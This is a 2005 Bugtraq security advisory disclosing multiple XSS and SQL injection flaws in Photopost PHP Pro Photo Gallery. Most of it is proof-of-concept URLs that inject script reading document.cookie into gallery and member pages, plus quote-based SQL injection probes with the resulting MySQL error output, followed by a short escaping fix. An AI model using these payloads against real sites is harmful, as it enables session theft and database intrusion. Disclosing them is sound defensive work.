[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple Sql injection, and multiple XSS vulnerabilities in
From:       <dcrab () hackerscenter ! com>
Date:       2005-03-28 19:52:32
Message-ID: 20050328195232.16038.qmail () www ! securityfocus ! com
[Download RAW message or body]



Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity:  High
Title: Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro \
                Photo Gallery Software.
Date: March  29,  2005

Summary:
There are multiple sql injection, xss vulnerabilities in the Photopost PHP Pro Photo \
                Gallery Software.
Vendor: Photopost
Vendor website: http://www.photopost.com/

Proof of Concept Exploits:
http://localhost/photos/showgallery.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/photos/showgallery.php?si=&sort=1&cat=2&ppuser=&friendemail=%3d'email \
%40yourfriend.com')this.value%3d''%3b&password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Eal \
ert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=
 Pops cookie


http://localhost/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cook \
ie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=
 Pops cookie


http://localhost/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=
 Pops cookie


http://localhost/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser=
 Pops cookie


http://localhost/photos/showmembers.php?sl='SQL_INJECTION
SQL INJECTION
MySQL error reported!

Script: showmembers

Query: SELECT user,userid,SUM(views) AS tviews,COUNT(*) AS pcount,MAX(lastpost) AS \
maxlast,MAX(date) AS maxdate,date,SUM(filesize) AS tfilesize,id FROM photos WHERE \
user LIKE ''SQL_INJECTION%' GROUP BY user ORDER BY user ASC

Result: You have an error in your SQL syntax. Check the manual that corresponds to \
your MySQL server version for the right syntax to use near 'SQL_INJECTION%' GROUP BY \
user ORDER BY user ASC' at line 2

Database handle: Resource id #1


http://localhost/photos/showphoto.php?photo='SQL_ERROR
SQL ERROR, INFORMATION DISCLOSURE
MySQL error reported!

Script: showphoto

Query: SELECT id,bigimage,cat,userid,approved,storecat FROM photos WHERE cat='' AND \
userid= AND approved='1' ORDER BY disporder,lastpost DESC

Result: You have an error in your SQL syntax. Check the manual that corresponds to \
your MySQL server version for the right syntax to use near 'AND approved='1' ORDER BY \
disporder,lastpost DESC' at line 1

Database handle: Resource id #1


http://localhost/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bpassword=&amp%3bsort=1&amp%3bcat=502
 Pops cookie


Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding \
these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure \
coding with php.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic